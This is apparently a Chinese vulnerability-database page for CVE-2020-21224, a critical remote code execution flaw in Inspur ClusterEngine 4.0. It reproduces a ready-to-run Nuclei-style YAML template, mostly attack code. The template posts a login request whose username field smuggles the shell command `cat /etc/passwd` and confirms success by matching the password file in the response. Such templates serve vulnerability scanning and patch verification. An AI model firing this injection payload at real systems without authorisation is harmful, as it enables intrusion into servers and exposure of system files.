CVE-2020-21224: Inspur ClusterEngine 4.0 - Remote Code Execution

日期: 2025-08-01 | 影响软件: Inspur ClusterEngine 4.0 | POC: 已公开

漏洞描述

Inspur ClusterEngine V4.0 is suscptible to a remote code execution vulnerability. A remote attacker can send a malicious login packet to the control server.

PoC代码[已公开]

id: CVE-2020-21224

info:
  name: Inspur ClusterEngine 4.0 - Remote Code Execution
  author: pikpikcu
  severity: critical
  description: Inspur ClusterEngine V4.0 is suscptible to a remote code execution vulnerability. A remote attacker can send a malicious login packet to the control server.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
  remediation: |
    Apply the latest security patches or updates provided by Inspur to mitigate this vulnerability.
  reference:
    - https://github.com/NS-Sp4ce/Inspur/tree/master/ClusterEngineV4.0%20Vul
    - https://nvd.nist.gov/vuln/detail/CVE-2020-21224
    - https://github.com/NS-Sp4ce/Inspur/
    - https://github.com/SexyBeast233/SecBooks
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-21224
    cwe-id: CWE-88
    epss-score: 0.9214
    epss-percentile: 0.99699
    cpe: cpe:2.3:a:inspur:clusterengine:4.0:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: inspur
    product: clusterengine
  tags: cve2020,cve,clusterengine,rce,inspur

http:
  - method: POST
    path:
      - "{{BaseURL}}/login"

    body: |
      op=login&username=;`cat /etc/passwd`&password=

    headers:
      Content-Type: application/x-www-form-urlencoded
      Referer: "{{Hostname}}/module/login/login.html"

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100c023c61a5288f4c0389398dac6ab71f4216a7b17eaba4ffc3b9ab48bb9121b8c022000f7d006ed85b094474114693906da5c2d7436a7bfca828bb8ae5872e496bc44:922c64590222798bb761d5b6d8e72950

相关漏洞推荐